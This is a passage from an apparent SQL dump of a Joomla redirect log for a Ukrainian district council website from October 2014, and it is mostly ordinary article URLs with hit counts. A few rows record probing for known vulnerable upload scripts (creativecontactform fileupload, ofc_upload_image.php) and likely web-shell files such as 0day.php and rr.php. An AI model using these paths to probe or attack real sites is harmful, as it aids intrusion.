00:00:00',301),(9069,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&lang=en&option=com_content&view=article','','','',2,0,'2014-10-27 09:39:20','0000-00-00 00:00:00',301),(9070,'http://www.malyn-rayrada.org.ua/sivut/components/com_creativecontactform/fileupload/index.php','','','',2,0,'2014-10-27 09:41:10','0000-00-00 00:00:00',301),(9071,'http://www.malyn-rayrada.org.ua/sivut/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-10-27 09:41:18','0000-00-00 00:00:00',301),(9072,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-10-27 11:04:02','0000-00-00 00:00:00',301),(9073,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1031:2013-06-17-06-49-26&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-27 11:13:19','0000-00-00 00:00:00',301),(9074,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/785-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_2','',6,0,'2014-10-27 11:47:51','0000-00-00 00:00:00',301),(9075,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=978:-6612-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-27 12:47:02','0000-00-00 00:00:00',301),(9076,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1189:2014-01-28-09-46-45&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 12:47:08','0000-00-00 00:00:00',301),(9077,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1204:2014-01-31-07-51-23&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-27 13:07:25','0000-00-00 00:00:00',301),(9078,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/665-pro-nadannja-dozvolu-komunalnij-ustanovi-malinskij','',22,0,'2014-10-27 14:31:09','0000-00-00 00:00:00',301),(9079,'http://www.malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',8,0,'2014-10-27 14:33:10','0000-00-00 00:00:00',301),(9080,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/608-pro-prodovzhennja-dii-kontraktu-z-kerivnikom','',16,0,'2014-10-27 15:10:07','0000-00-00 00:00:00',301),(9081,'http://www.malyn-rayrada.org.ua/index.php','','','',1,0,'2014-10-27 15:22:24','0000-00-00 00:00:00',301),(9082,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=930:2013-02-21-09-13-00&lang=uk&option=com_content&view=article','','','',7,0,'2014-10-27 15:55:05','0000-00-00 00:00:00',301),(9083,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1089:-l-r-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-27 16:14:33','0000-00-00 00:00:00',301),(9084,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=319:-2009-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-27 16:15:29','0000-00-00 00:00:00',301),(9085,'http://malyn-rayrada.org.ua/images/stories/0day.php','','','',2,0,'2014-10-27 16:39:51','0000-00-00 00:00:00',301),(9086,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1244:-2014-2018-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-27 17:29:05','0000-00-00 00:00:00',301),(9087,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1035:2013-06-25-09-55-31&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 17:29:11','0000-00-00 00:00:00',301),(9088,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-10-27 17:34:14','0000-00-00 00:00:00',301),(9089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-10-27 17:35:00','0000-00-00 00:00:00',301),(9090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-10-27 17:39:45','0000-00-00 00:00:00',301),(9091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-27 18:25:48','0000-00-00 00:00:00',301),(9092,'http://www.malyn-rayrada.org.ua/images/stories/0day.php','','','',4,0,'2014-10-27 18:51:53','0000-00-00 00:00:00',301),(9093,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-27 18:56:33','0000-00-00 00:00:00',301),(9094,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1014:2013-06-03-06-43-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-27 19:03:08','0000-00-00 00:00:00',301),(9095,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1329:2014-06-02-11-51-47&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 19:23:53','0000-00-00 00:00:00',301),(9096,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1092:2013-09-19-12-18-37&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 19:24:25','0000-00-00 00:00:00',301),(9097,'http://www.malyn-rayrada.org.ua/attachments/article/26/wp-login.php','','','',2,0,'2014-10-27 19:52:59','0000-00-00 00:00:00',301),(9098,'http://www.malyn-rayrada.org.ua/attachments/article/wp-login.php','','','',1,0,'2014-10-27 19:53:03','0000-00-00 00:00:00',301),(9099,'http://www.malyn-rayrada.org.ua/attachments/wp-login.php','','','',1,0,'2014-10-27 19:53:08','0000-00-00 00:00:00',301),(9100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-10-27 20:25:15','0000-00-00 00:00:00',301),(9101,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1256:2014-03-27-17-22-43&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-27 20:36:59','0000-00-00 00:00:00',301),(9102,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-27 20:37:03','0000-00-00 00:00:00',301),(9103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-27 20:50:58','0000-00-00 00:00:00',301),(9104,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1151:2013-11-28-14-54-33&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 20:57:44','0000-00-00 00:00:00',301),(9105,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1070:2013-08-23-04-27-00&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-27 20:57:57','0000-00-00 00:00:00',301),(9106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-27 21:25:26','0000-00-00 00:00:00',301),(9107,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32&id=853:2012-12-11-13-39-46&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-27 22:11:01','0000-00-00 00:00:00',301),(9108,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1098:2013-09-25-09-34-57&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-27 22:32:37','0000-00-00 00:00:00',301),(9109,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1278:2014-04-11-13-44-30&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-27 23:44:38','0000-00-00 00:00:00',301),(9110,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1346:2014-06-18-11-51-53&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 23:44:44','0000-00-00 00:00:00',301),(9111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',3,0,'2014-10-28 00:11:55','0000-00-00 00:00:00',301),(9112,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&lang=uk&layout=default&option=com_content','',3,0,'2014-10-28 01:10:51','0000-00-00 00:00:00',301),(9113,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1044:2013-07-05-11-26-05&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-28 01:18:34','0000-00-00 00:00:00',301),(9114,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1196:2014-01-30-14-12-50&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 02:53:06','0000-00-00 00:00:00',301),(9115,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=974:2013-03-20-09-31-37&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 02:53:14','0000-00-00 00:00:00',301),(9116,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1082:-2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 03:14:04','0000-00-00 00:00:00',301),(9117,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1323:2014-05-27-13-21-50&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 03:14:34','0000-00-00 00:00:00',301),(9118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46:--21122012&Itemid=85&lang=ru','','','',4,0,'2014-10-28 03:39:57','0000-00-00 00:00:00',301),(9119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:--21022013-&Itemid=86&lang=uk','','','',3,0,'2014-10-28 04:08:12','0000-00-00 00:00:00',301),(9120,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46:--21122012&Itemid=85&lang=ru','','','',5,0,'2014-10-28 04:12:59','0000-00-00 00:00:00',301),(9121,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1193:-2014-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-28 04:27:02','0000-00-00 00:00:00',301),(9122,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=908:2013-01-21-08-58-40&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-28 04:48:59','0000-00-00 00:00:00',301),(9123,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1047:2013-07-10-05-51-36&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-28 04:49:05','0000-00-00 00:00:00',301),(9124,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=en','','','',2,0,'2014-10-28 05:37:58','0000-00-00 00:00:00',301),(9125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=en','','','',2,0,'2014-10-28 05:43:00','0000-00-00 00:00:00',301),(9126,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-28 05:53:10','0000-00-00 00:00:00',301),(9127,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1337:2014-06-10-11-11-42&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-28 06:02:23','0000-00-00 00:00:00',301),(9128,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1332:2014-06-04-09-44-02&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-28 06:02:29','0000-00-00 00:00:00',301),(9129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=en','','','',2,0,'2014-10-28 06:52:39','0000-00-00 00:00:00',301),(9130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-28 06:56:25','0000-00-00 00:00:00',301),(9131,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=en','','','',5,0,'2014-10-28 07:12:53','0000-00-00 00:00:00',301),(9132,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1353:2014-07-01-05-08-54&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-28 07:35:34','0000-00-00 00:00:00',301),(9133,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1277:-2014-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-28 07:35:55','0000-00-00 00:00:00',301),(9134,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1068:-22-&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-28 07:36:35','0000-00-00 00:00:00',301),(9135,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&lang=en&option=com_content&view=article','','','',6,0,'2014-10-28 07:36:42','0000-00-00 00:00:00',301),(9136,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=910:-22-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 09:10:15','0000-00-00 00:00:00',301),(9137,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1073:2013-08-30-11-12-19&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-28 09:10:17','0000-00-00 00:00:00',301),(9138,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1373:2014-08-07-11-39-57&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-28 09:10:30','0000-00-00 00:00:00',301),(9139,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1308:2014-05-05-05-20-51&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-28 10:42:40','0000-00-00 00:00:00',301),(9140,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1259:1&lang=en&option=com_content&view=article','','','',7,0,'2014-10-28 10:44:46','0000-00-00 00:00:00',301),(9141,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1234:2014-03-04-09-59-46&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 10:44:49','0000-00-00 00:00:00',301),(9142,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1315:-31-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-28 11:05:35','0000-00-00 00:00:00',301),(9143,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',4,0,'2014-10-28 12:01:12','0000-00-00 00:00:00',301),(9144,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1275:2014-04-10-13-24-47&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-28 12:15:51','0000-00-00 00:00:00',301),(9145,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1095:2013-09-24-13-25-55&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-28 12:15:53','0000-00-00 00:00:00',301),(9146,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1353:2014-07-01-05-08-54&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 12:18:34','0000-00-00 00:00:00',301),(9147,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1062:2013-07-29-13-33-29&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-28 12:40:22','0000-00-00 00:00:00',301),(9148,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1019:2013-06-06-11-26-38&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-28 13:49:28','0000-00-00 00:00:00',301),(9149,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1018:2013-06-06-11-22-34&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-28 13:49:30','0000-00-00 00:00:00',301),(9150,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1109:2013-10-18-10-25-30&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 13:49:32','0000-00-00 00:00:00',301),(9151,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=922:2013-02-11-10-53-17&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-28 13:52:55','0000-00-00 00:00:00',301),(9152,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1063:2013-08-02-17-32-04&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-28 15:22:34','0000-00-00 00:00:00',301),(9153,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=999:2013-04-28-05-21-05&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-28 15:27:10','0000-00-00 00:00:00',301),(9154,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=956:2013-03-07-14-51-33&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 16:55:32','0000-00-00 00:00:00',301),(9155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=ru','','','',5,0,'2014-10-28 16:58:51','0000-00-00 00:00:00',301),(9156,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=937:---------------------------21122012--l--&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 17:01:33','0000-00-00 00:00:00',301),(9157,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1230:l-r&lang=en&option=com_content&view=article','','','',3,0,'2014-10-28 17:22:49','0000-00-00 00:00:00',301),(9158,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1102:2013-10-03-08-08-33&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 17:23:04','0000-00-00 00:00:00',301),(9159,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1141:2013-11-26-13-18-12&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 18:28:41','0000-00-00 00:00:00',301),(9160,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1301:-28-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 18:35:05','0000-00-00 00:00:00',301),(9161,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=922:2013-02-11-10-53-17&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-28 18:35:09','0000-00-00 00:00:00',301),(9162,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1217:2014-02-21-13-52-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-28 18:57:08','0000-00-00 00:00:00',301),(9163,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=912:2013-01-22-14-14-06&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-28 20:02:09','0000-00-00 00:00:00',301),(9164,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-28 20:07:54','0000-00-00 00:00:00',301),(9165,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1097:2013-09-25-08-35-50&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 20:09:56','0000-00-00 00:00:00',301),(9166,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1333:2014-06-05-13-09-03&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 20:09:59','0000-00-00 00:00:00',301),(9167,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1212:2014-02-07-07-01-38&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-28 20:10:01','0000-00-00 00:00:00',301),(9168,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-28 21:29:17','0000-00-00 00:00:00',301),(9169,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1110:-9-2013-&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-28 21:35:11','0000-00-00 00:00:00',301),(9170,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 21:44:21','0000-00-00 00:00:00',301),(9171,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/26-malinskij-rajon-vikipedija','',1,0,'2014-10-28 21:58:28','0000-00-00 00:00:00',301),(9172,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-28 22:05:58','0000-00-00 00:00:00',301),(9173,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1089:--------l---r---&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-28 23:08:51','0000-00-00 00:00:00',301),(9174,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=949:2013-03-06-12-51-36&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-28 23:08:55','0000-00-00 00:00:00',301),(9175,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=911:2013-01-22-13-27-41&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-28 23:17:55','0000-00-00 00:00:00',301),(9176,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1181:2014-01-22-06-06-13&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-29 00:42:12','0000-00-00 00:00:00',301),(9177,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1138:-15112013&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 00:42:27','0000-00-00 00:00:00',301),(9178,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1044:2013-07-05-11-26-05&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-29 00:52:23','0000-00-00 00:00:00',301),(9179,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1001:2013-04-30-12-14-17&lang=en&option=com_content&view=article','','','',1,0,'2014-10-29 01:15:33','0000-00-00 00:00:00',301),(9180,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1086:2013-09-16-13-00-16&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-29 02:15:34','0000-00-00 00:00:00',301),(9181,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1365:2014-07-10-13-58-58&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-29 02:25:25','0000-00-00 00:00:00',301),(9182,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=997:-27-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 02:25:35','0000-00-00 00:00:00',301),(9183,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-29 02:34:38','0000-00-00 00:00:00',301),(9184,'http://malyn-rayrada.org.ua/index.php/--25072012-?start=5','','','',1,0,'2014-10-29 03:22:58','0000-00-00 00:00:00',301),(9185,'http://malyn-rayrada.org.ua/index.php/--25072012-?start=20','','','',1,0,'2014-10-29 03:44:56','0000-00-00 00:00:00',301),(9186,'http://malyn-rayrada.org.ua/index.php/--25072012-?start=15','','','',1,0,'2014-10-29 03:48:41','0000-00-00 00:00:00',301),(9187,'http://malyn-rayrada.org.ua/index.php/--25072012-?start=30','','','',1,0,'2014-10-29 03:50:26','0000-00-00 00:00:00',301),(9188,'http://malyn-rayrada.org.ua/index.php/--25072012-?start=25','','','',1,0,'2014-10-29 03:59:17','0000-00-00 00:00:00',301),(9189,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1199:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 05:21:47','0000-00-00 00:00:00',301),(9190,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1357:22-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-29 05:34:51','0000-00-00 00:00:00',301),(9191,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1194:-2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 06:01:03','0000-00-00 00:00:00',301),(9192,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1357:22-&lang=en&option=com_content&view=article','','','',3,0,'2014-10-29 06:55:14','0000-00-00 00:00:00',301),(9193,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-29 06:59:33','0000-00-00 00:00:00',301),(9194,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=986:-20-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-29 10:01:33','0000-00-00 00:00:00',301),(9195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-29 10:59:31','0000-00-00 00:00:00',301),(9196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-------------2012-2015-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-10-29 11:00:37','0000-00-00 00:00:00',301),(9197,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1222:2014-02-22-10-52-44&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-29 11:34:44','0000-00-00 00:00:00',301),(9198,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/45-analiz-reguljatornogo-vplivu','',2,0,'2014-10-29 12:05:15','0000-00-00 00:00:00',301),(9199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:--21022013-&Itemid=86&lang=uk','','','',1,0,'2014-10-29 12:33:18','0000-00-00 00:00:00',301),(9200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47:--21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-29 13:01:29','0000-00-00 00:00:00',301),(9201,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1264:2014-04-01-11-27-13&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-29 13:07:32','0000-00-00 00:00:00',301),(9202,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1277:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-29 13:07:52','0000-00-00 00:00:00',301),(9203,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-------------2012-2015-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-10-29 13:10:00','0000-00-00 